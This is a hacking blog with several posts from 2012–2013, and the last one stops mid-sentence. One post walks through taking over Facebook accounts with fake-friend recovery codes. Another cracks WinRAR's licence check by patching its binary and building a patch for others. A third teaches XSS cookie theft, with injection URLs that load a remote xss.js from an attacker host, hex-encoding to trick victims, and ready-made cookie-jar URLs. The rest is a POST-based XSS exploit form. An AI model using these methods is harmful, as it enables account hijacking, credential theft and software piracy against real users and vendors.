Hacks, a blog by Varun Gupta<br />
Hack Facebook Passwords by adding people into friend list (posted 2013-06-13)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
It isn’t entirely unusual that Facebook users receive friend requests from people they do not know. Often, those friend requests are blindly accepted in an effort to grow the friendship base. It seems that especially people with Facebook accounts that are primarily used for marketing purposes are more likely to accept friend requests from people they do not know than the typical Facebook user does.</div>
<br style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" />
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px; text-align: center;">
<b>Such accounts could be hacked easily, and there is no ingenious hacking talent required to do so: You simply need to walk through Facebook’s password recovery process with two other Facebook friends of a targeted account.</b></div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">You can easily gain access to your friend’s Facebook account through a collusion approach. You have to use Facebook’s password recovery feature, which is accessible through the </span><b style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">“Forgot your password?” </b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">link on the Facebook login page.</span><br style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" /><br style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" /><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Once the friend is identified, Facebook suggests recovering the password via the existing email address. However, you can bypass this hurdle by clicking </span><b style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">the “No longer have access to these?” link. </b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">In that case, Facebook asks for a new email address. In the following step, Facebook presents the security question tied to the account. However, you can also bypass the question by </span><b style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">typing wrong answers three times in a row.</b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;"> After that, Facebook provides a rather surprising way to get your account back – </span><b style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">via the support of three friends.</b><div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt4rA0RB6FMzUApp3maQ1xQR1ezlczHiePgeHnPWxBAGCPIa6Yw2J3FWqESNk8PkeeOUwG4x6FPIFsZ-xUGoXk26X1Kk120lwoiAQOoeruwISHapvj8riJW5qDzkARj5F-gunfbp_-va4N/s1600/How+to+Hack+Facebook+Password+Facebook+Password+Hacker+How+to+Hack+Facebook+Password+Facebook+Password+Hacker.jpg" style="color: black; outline: none;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5603215484286363810" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt4rA0RB6FMzUApp3maQ1xQR1ezlczHiePgeHnPWxBAGCPIa6Yw2J3FWqESNk8PkeeOUwG4x6FPIFsZ-xUGoXk26X1Kk120lwoiAQOoeruwISHapvj8riJW5qDzkARj5F-gunfbp_-va4N/s400/How+to+Hack+Facebook+Password+Facebook+Password+Hacker+How+to+Hack+Facebook+Password+Facebook+Password+Hacker.jpg" style="border-width: 0px; cursor: pointer; display: block; height: 329px; margin: 0px auto 10px; text-align: center; width: 400px;" /></a></b>1. First, you select three friends “you trust”. These three friends then receive a code, which is required to change the account password.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
2. Select yourself and you immediately receive a code from Facebook. With those three codes, you can easily change the password for the targeted account.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
3. The problem clearly is that three friends you do not really know and cannot trust could potentially gain access to the victim Facebook account – through the standard password recovery feature.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
4. To bypass the problem mentioned in step 3, use <b><a href="http://hackguide4u.blogspot.com/search/label/Social%20Engineering" style="color: black; outline: none;">SOCIAL ENGINEERING</a>. </b>Create 2 more fake profiles of your own and add the victim as a friend on Facebook. Now get all the 3 codes and you are done.<br /><br /><b>NOTE: </b>The targeted account will be locked for 24 hours after this password change and the user’s old email address receives a notification of the password change as well as the names of the three friends who were given the codes. However, if these are friends with fake names, it doesn’t quite matter that you now know their names.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<br /></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now if a Facebook user could in fact be in a situation when a Facebook account is not checked within a 24-hour period, particularly since we enjoy flaunting our activities through Facebook status messages. And if the account is checked frequently, the account depends on Facebook’s response time, which can easily stretch to a number of days.</span><span style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;"><br /></span></div>
Steps to crack winrar password (posted 2013-06-13 by Varun Gupta)<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="font-family: Arial, Helvetica, sans-serif;">
The Tools</h2>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">To perform this hack you will be needing -</span><br />
<ol style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<li>Any disassembler (I use Hacker’s Disassembler and Hview)</li>
<li>Resource Hacker</li>
<li>A patch creator (use Universal Patch Creator or Code fusion)</li>
</ol>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">You will be able to get them by </span><a href="http://rdhacker.blogspot.com/search/label/Google" rel="nofollow" style="color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; outline: none;">googling</a><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;"> or you can download my set of tools provided.</span><br />
<h2 style="font-family: Arial, Helvetica, sans-serif;">
How to Crack ?</h2>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">You need to have a bit of knowledge of assembly language, and in case you don’t have it, just cram the steps and it will work anytime, every time. Download the latest version of WinRAR from their website and install it.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">I will be cracking WinRAR 3.80 here (cuz I already have it :P). This is basically a 2 step process (4 step, if you want to do things with a professional touch, period).</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image002.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now copy the WinRAR.exe file to desktop. Make a copy of it there.</span><br />
<h3 style="font-family: Arial, Helvetica, sans-serif;">
Step 1 – Hunting for Memory Address</h3>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now launch Hacker’s Disassembler and load the copy in it.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image003.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">The Disassembler will disassemble the executable in assembly code. Now you need to search for strings that are used in WinRAR program. Press Ctrl + F and type “evaluation” without quotes and search in the assembly code. Hit enter…</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image004.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">After you have reached this block of code by searching, just look at the block of code above it. There you will find that some assembly values are being compared and then the code jumps to some other function. Now look carefully: the “evaluation copy” function must be invoked after some specific condition is met. We need to look for it in the code and then make certain changes to the condition so that the program doesn’t check for the condition.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image006.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">In the above code you can see this code -</span><br />
<pre style="font-size: 13px;">00444B6A: 803DF4B84B0000 cmp byte ptr [004BB8F4], 00
00444B71: 0F859B000000 JNE 00444C12
</pre>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">This is the code responsible for validating you as a legal user </span><img alt=":)" class="wp-smiley" src="http://viralpatel.net/blogs/wp-includes/images/smilies/icon_smile.gif" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" /><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;"> . Just note down the memory address that leads to jump (JNE) at some memory location. In this case, note down 00444B71.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Note: For any WinRAR version, this code and memory address might be different, but the JNE will be the same. Just note down the respective memory address that checks.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now you need to search for the code that brings up that ugly nag screen “Please purchase WinRAR license” after your trial period of 40 days is over. For this, look over your toolbar and click on “D”, which stands for looking for Dialog references.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image007.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now in the dialog box that opens,search for “please” and you will get the reference as -</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">ID-REMINDER, “Please purchase WinRAR license”</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image008.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Double click on it and you will reach the subsequent code.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image009.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">The code will be something like</span><br />
<pre style="font-size: 13px;">* String: “REMINDER”
0048731A: 68EB5E4B00 push 004B5EEB
</pre>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Just note the memory address that invokes the REMINDER dialog. In this case it’s 0048731A. Note it down.</span><br />
<em style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Note: For any WinRAR version, this code and memory address might be different. But the Reminder memory address code will always PUSH something. Just note down the respective memory address that PUSHes.</em><br />
<h3 style="font-family: Arial, Helvetica, sans-serif;">
Step 2 – Fixing and Patching</h3>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now in this step we will be patching up values of memory addresses we noted earlier. I will be doing this using HVIEW.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now load the copy you disassembled in Hacker’s Disassembler in Hview.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image010.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">After you have loaded it, you will see the code is unreadable. It’s just like opening an EXE file in Notepad. You need to decode it. To do that, just press F4 and you will get an option to decode it. Hit DECODE and you will be able to see code in the form of assembly code and memory addresses.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image011.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">After you have done that, you need to search for the memory addresses you noted down earlier. Just hit F5 and a search box will appear. Now you need to enter the memory address. To do that, enter a “.” and then type the memory address, leaving out the leading “00”. The “.” will suffice for “00”, i.e. -</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Type .444B71 in place of 00444B71</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image012.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">and search in the code.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image013.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">After you have reached the respective code, you need to make changes to it. Press F3 and you will be able to edit the code. Now make the following changes –</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image014.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">After you have done it, save it by pressing F9.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now search for next memory location by pressing F5 and entering it. Reach there and make the following changes by pressing F3 -</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image015.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Save the changes by pressing F9 and exit HVIEW by pressing F10.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Congrats…You have cracked WinRAR </span><img alt=":)" class="wp-smiley" src="http://viralpatel.net/blogs/wp-includes/images/smilies/icon_smile.gif" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" /><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;"> Replace the original WinRAR.exe with this copyofwinrar.exe by renaming it. It will work 100% fine </span><img alt=":P" class="wp-smiley" src="http://viralpatel.net/blogs/wp-includes/images/smilies/icon_razz.gif" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" /><br />
<h3 style="font-family: Arial, Helvetica, sans-serif;">
Step 3 – Spicing up the EXE</h3>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now that you have a 100% working version of the EXE, you might want to change your registration information in WinRAR. To do this, you can use Resource Hacker.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image016.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Launch Resource Hacker, load the copyofwinrar.exe in it</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image017.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now go to DIALOG –> Expand tree –> ABOUTRARDLG and click it. Now Find Trial copy line and replace it with your favorite one </span><img alt=":P" class="wp-smiley" src="http://viralpatel.net/blogs/wp-includes/images/smilies/icon_razz.gif" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" /><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image018.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">and click on Compile Script button.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image019.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now save the file with any name on your desktop or any location whatsoever.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image020.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now you have a fully patched WinRAR.exe file </span><img alt=":)" class="wp-smiley" src="http://viralpatel.net/blogs/wp-includes/images/smilies/icon_smile.gif" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" /><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;"> You can either use it, or also distribute it like a real cracker. If you want to learn that, move on to the next step.</span><br />
<h3 style="font-family: Arial, Helvetica, sans-serif;">
Step 4 – Creating a working Patch (or giving Professional touch <img alt=":P" class="wp-smiley" src="http://viralpatel.net/blogs/wp-includes/images/smilies/icon_razz.gif" /> )</h3>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">I will be using diablo2oo2′s Universal Patcher (UPE) for creating the patch. The patch will work like any authentic one for that WinRAR version, just like the one you downloaded at any time of your life from any Crack and Keygen website.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Launch Patch Creator and click on add new project. Enter project Information and click on save.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image021.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Click on Add – > Offset patch</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image022.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">After you have done that, double click on offset patch and then</span><br />
<ol style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<li>Give path of original winrar.exe</li>
<li>Give path of unmodified Winrar.exe (again)</li>
<li>Give path for fully patched Winrar.exe (ie Cracked Winrar.exe in this case)</li>
<li>Click on compare and it will show difference between both files</li>
<li>Click on save.</li>
</ol>
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image023.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now in the next window, click on Create Patch and save it. The Patch will be created. Now copy it in WinRAR installation directory and hit on patch, it WILL</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image024.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Congrats you have created a patch of your own and have learned to crack WinRAR </span><img alt=":)" class="wp-smiley" src="http://viralpatel.net/blogs/wp-includes/images/smilies/icon_smile.gif" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" /><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image025.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">You can crack other software in the same way…just practice, debug and disassemble and you will get the way </span><img alt=":)" class="wp-smiley" src="http://viralpatel.net/blogs/wp-includes/images/smilies/icon_smile.gif" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" /><br />
<em style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">[PS: The above is the long way to do it, I will be telling you the shortest way to crack WinRAR in just 1 step, the main aim of this tutorial was to introduce you to disassemblers and tools, and do some dirty work with your hand. <br />]</em><span style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;"><br /></span></div>
How to prevent cross site scripting XSS attacks (posted 2012-11-27 by Varun Gupta)<div dir="ltr" style="text-align: left;" trbidi="on">
XSS: Are Your Applications Vulnerable? Here is a detailed guide to preventing cross site scripting attacks.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4-RAGY7vsr82rF5GHiRPjcUIeQDn9m2zO3BHKLqTXQ4rhj9SlJ4B82FtwFEbpRT9ZkEi0R24Yp20BD-sNmK34r0A_RggfcB4-8tGfU5SrsaVAVdy1Nt5L9eSy2h14MQOlTb0LNJza1oM/s1600/xss.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4-RAGY7vsr82rF5GHiRPjcUIeQDn9m2zO3BHKLqTXQ4rhj9SlJ4B82FtwFEbpRT9ZkEi0R24Yp20BD-sNmK34r0A_RggfcB4-8tGfU5SrsaVAVdy1Nt5L9eSy2h14MQOlTb0LNJza1oM/s320/xss.PNG" width="320" /></a></div>
<a href="https://hotfile.com/dl/181350582/33dc6b8/XSS_Are_Your_Applications_Vulnerable.pdf.html" target="_blank">click here</a> to download</div>
cross site scripting XSS cookie stealing tutorial (posted 2012-11-27 by Varun Gupta)<div dir="ltr" style="text-align: left;" trbidi="on">
Well, what is an XSS attack? It is the art of running scripts on your victim's PC. You can run almost any script in their browser with the right knowledge; the most common use of XSS is stealing cookies.<br />
Cookies are bits of information used by web servers / web sites to check who you are on that site.<br />
If you are a guest, the site sets a cookie saying you are a guest. When you log in, it replaces that cookie with the cookie for your login, which will have your login ID and sometimes, if it's a forum, your password as an MD5 hash,<br />
and other stuff the site can think of using to make sure you are who you say you are,<br />
like session IDs that expire after a time limit the server sets, like 10 mins or 60 mins.<br />
Well, the cookie has sections that are named, so when the server checks who you are<br />
it will read bits of data like the ID and the MD5 hash. If it's a forum, most<br />
of the time the forum will be using the default cookie prefix, like<br />
nukeevo_ID and so on, but the forum admin can change that.<br />
<br />
<br />
What's a user ID? Well, if you are the first to sign up to a forum, your ID will be ONE, because you <br />
will be the first in the SQL table ... I will talk about the SQL tables later. The admin account is<br />
nearly always ID 1 or 2, because of course he would have had to make the account first <br />
to configure the forum. Now, there are ways of looking for this type of attack.<br />
First, take the hacker's point of view: the aim is to run that script no matter what, looking at every way<br />
he or she can find. On MySpace people were using Flash files, not to steal cookies (because MySpace filters <br />
JavaScript) but instead to redirect to a fake login page; the files for this can be found in downloads.<br />
That was using .swf files, but the newest one for MySpace is using .mov files, that is, QuickTime files,<br />
to load a URL, which would be your fake login. A good FREE server to host and run PHP files is <br />
www.php1h.com; you would upload your cookie stealing scripts to that server so you can send the user's cookie <br />
to that site and view it in the log.<br />
<br />
OK, how you could set it up would be: <br />
<br />
http://evilhacker.php1h.com/cookiestealer.php = this is the backbone; it takes the cookie from the JavaScript we run, called XSS.js<br />
<br />
http://evilhacker.php1h.com/log.php = this is the log where the cookie will be sent after the cookiestealer has sent it to the log <br />
<br />
www.evilhacker.php1h.com/xss.js = this is the JavaScript that gives the cookie to the cookiestealer.php <br />
<br />
<br />
: finding XSS attacks :<br />
Well, the first way is viewing the site and looking around for any input boxes, and then viewing the source of that site for the name of the input<br />
box we find an XSS exploit in. When looking for an XSS you need to make sure that <br />
you look at the URL in the URL bar, and you might see stuff that looks like <br />
www.site.com/blah.html or .php or .cfm or .jsp ..<br />
Make sure it has the full URL, and if it has stuff after a ? mark, add it at the end of the URL like this, by using a &<br />
www.site.com/page.php?MID=2&(NAME_OF_INPUT_BOX)=(script) so if the input box was called milk for some reason, I don't know why, but just for this tut let's say that, and that the script will just print the words Xss on screen.<br />
<br />
www.site.com/page.php?MID=2&MILK="><script>alert("Xss")</script> <br />
<br />
The "> is there because it tells the input box to stop reading there, and then it runs the JavaScript.<br />
And if the input box was called cat it would look like this<br />
<br />
www.site.com/page.php?MID=2&cat="><script>alert("Xss")</script> <br />
<br />
So go round a site looking for any type of input boxes. Sometimes I find that if a site has<br />
send to a friend, that email box sometimes works.<br />
<br />
After you have found it, i.e. you get a pop up with the words Xss in it, view source and look for the words Xss in an input box. The basic syntax for how it will look is <br />
<br />
<input type="hidden" name="milk" value="" /> <br />
You see, and from there you will make the URL, <br />
which I will talk about at the end. So after finding an XSS and being able to run it in your browser, <br />
you want to start running the cookie grabbing scripts in your browser. They will look like this <br />
<br />
www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.js"></script><br />
<br />
If you sent someone that link in an email or on MSN it would run in their browser<br />
to execute that JavaScript to steal their cookies from site.com. So if you found an XSS in msn.com<br />
you would have the cookies from msn.com <br />
<br />
But you might ask yourself, how do I swap my cookies? Well, if you are using Firefox there is an add-on you can install called cookie editor, and <br />
then you can edit your cookies. Or using IE, I'm sure you can edit them in internet temp files or something, but your best bet is FF (Firefox).<br />
Just remember, when you steal the cookies they won't all be one long string; they should be broken up into names like UID, others.... out there, but you will just have <br />
to work that out for yourself.<br />
<br />
Sending the link to a victim can be hard work sometimes. If someone sent you a link that looked like this:<br />
www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.js"></script> I wouldn't click it. <br />
But :P if you encoded some of the characters in that URL into hex like this,<br />
using this table:<br />
[img]http://62.31.49.95/asciifull.gif[/img]<br />
you could encode it to look something like this: <br />
<br />
%22%3E%3Cscript src=%22%http://evilhacker.php1h.com/xss.js%22>3E%3C/script%3E = is the script encoded in hex <br />
Would you click that instead? And to send it through MSN you might want to add another & at the end and fill it with shit,<br />
like<br />
www.site.com/page.php?MID=2&MILK=%22%3E%3Cscript src=%22%http://evilhacker.php1h.com/xss.js%22>3E%3C/script%3E&mk=12<that wud just make it think it needs to include the link the full of it the is other ways like useing .gif images to run the script on the site but thats a nother story.<br />
<br />
Well, that's it for now. Hope you enjoyed the read. <br />
VOl :v60-hackers:<br />
<br />
:info:<br />
I have set up some cookie jars for the people too lazy <br />
<br />
http://v60.php1h.com/cookiejar/xss.js<br />
http://v60.php1h.com/cookiejar/log.php</div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com18tag:blogger.com,1999:blog-8450897627020793899.post-32337850206163541182012-11-27T20:41:00.001-08:002012-11-27T21:15:06.732-08:00A guide to advanced cross site scripting XSS<div dir="ltr" style="text-align: left;" trbidi="on">
• Introduction<br />
• POST Method<br />
• Expansion on POST: secure areas<br />
• Generalized client automation<br />
• Prevention<br />
<br />
<b>Introduction</b><br />
I recently read in an article the incorrect statement that cross site<br />
scripting (XSS) can not be exploited if the POST method is used<br />
instead of GET, which is completely false. The method used to exploit<br />
POST variables may also be modified to allow for more advanced<br />
timing attacks which could allow an attacker to gain access to areas<br />
that require the user log in to a password protected area. When<br />
coupled with social engineering this method becomes an extremely<br />
reliable tool for attackers to gain access to secured areas via account<br />
hijacking.<br />
In typical cross site scripting the target views a website which<br />
contains code inserted into the HTML which was not written by the<br />
website designer or administrator. This bypasses the document object<br />
model which was intended to protect domain specific cookies<br />
(sessions, settings, etc.). In most instances the target is sent a link to<br />
a website on the server which the target has a legitimate account and<br />
by viewing that website the attackers malicious code is executed<br />
(commonly javascript to send the user's cookie to a third party server,<br />
in effect stealing their session and their account). This was a quick<br />
overview of cross site scripting and a solid foundation is needed<br />
before proceeding, my recommended reading is iDefense's XSS article<br />
(google.com). The attack presented below in conjunction with<br />
iDefense's method of attack automation makes for a very powerful<br />
combination.<br />
NOTE (October 19 2003) – Sverre Huseby has brought to my attention<br />
that the generalized version attack is not unique, it was discovered<br />
first by Jim Fulton<br />
(http://www.zope.org/Members/jim/ZopeSecurity/ClientSideTrojan),<br />
without my knowledge.<br />
<br />
<b>Post Method</b><br />
Because POST variables are sent separate of the actual website URL a<br />
direct attack from the target clicking on the malicious link and<br />
directly accessing the server vulnerable to the XSS attack is not<br />
possible (as far as I know). This is opposed to a GET request where<br />
the variable arguments are stored in the URL, such as<br />
http://www.google.com/search?hl=en&q=xss where the variables hl<br />
and q are seen in the URL. The implications of variables being sent in<br />
this manner are not in the scope of this article, but the POST method<br />
sends variables in the HTTP request and is not integrated in the URL<br />
such as is the case with GET.<br />
To exploit a web page with a cross site scripting vulnerability via a<br />
GET variable a URL in the form of<br />
http://vulnerable.com/search?q=<script>alert(document.cookie)<br />
</script> is composed. This URL is then sent to the target, upon<br />
clicking the URL they are taken to vulnerable.com's handy search<br />
engine (not to mention the dual HTML rendering within their site<br />
functionality) and the target receives a javascript pop up with their<br />
session cookie.<br />
Creating exploits for POST requests is only trivially more difficult:<br />
an intermediary web page is needed which will hold code that will<br />
force the client web browser into making the POST request to the<br />
vulnerable server. This is trivially done via a form (with method POST<br />
and action of the target script) and javascript code which will<br />
automatically submit the form on page load. See example code block<br />
below.<br />
<form method="POST" action="http://vulnerable.com/search"<br />
name="explForm"><br />
<input type=hidden name=q value="<script>alert<br />
(document.cookie)</script>"><br />
</form><br />
<script language="Javascript"><br />
setTimeout('explForm.submit()', 1);<br />
</script><br />
One millisecond after the page is loaded containing this code the form<br />
(completely invisible in the rendered HTML) is submitted. In this case<br />
you have a simple search for "<script>alert(document.cookie)<br />
</script>" done on vulnerable.com's search engine (and consequently<br />
a javascript alert appears because for the sake of this paper,<br />
vulnerable.com's search engine is vulnerable to a cross site scripting<br />
attack). The above code can be easily changed if the target script<br />
requires variables to be GET, change method="POST" to<br />
method="GET". The above code can be placed on a static web page<br />
on a web server controlled by the attacker and then the link sent to<br />
the target. Another vector to deliver the form and javascript to the<br />
target is via a site vulnerable to XSS through a GET request.<br />
In either case above the attacker sends the target the malicious web<br />
page, the malicious web page forms the request and the request is<br />
sent to the vulnerable server. This advances the classical cross site<br />
scripting attack from a single hop (target --> page within vulnerable<br />
website containing inserted code) to two hops (target --> intermediary<br />
request formulation page --> page within vulnerable website<br />
containing inserted code).<br />
<br />
<b>Expansion on POST: secure areas</b><br />
The problem of password protected areas also arises, where a<br />
password is required every time the user accesses the website. In<br />
many websites which require secure client access the cookie is not<br />
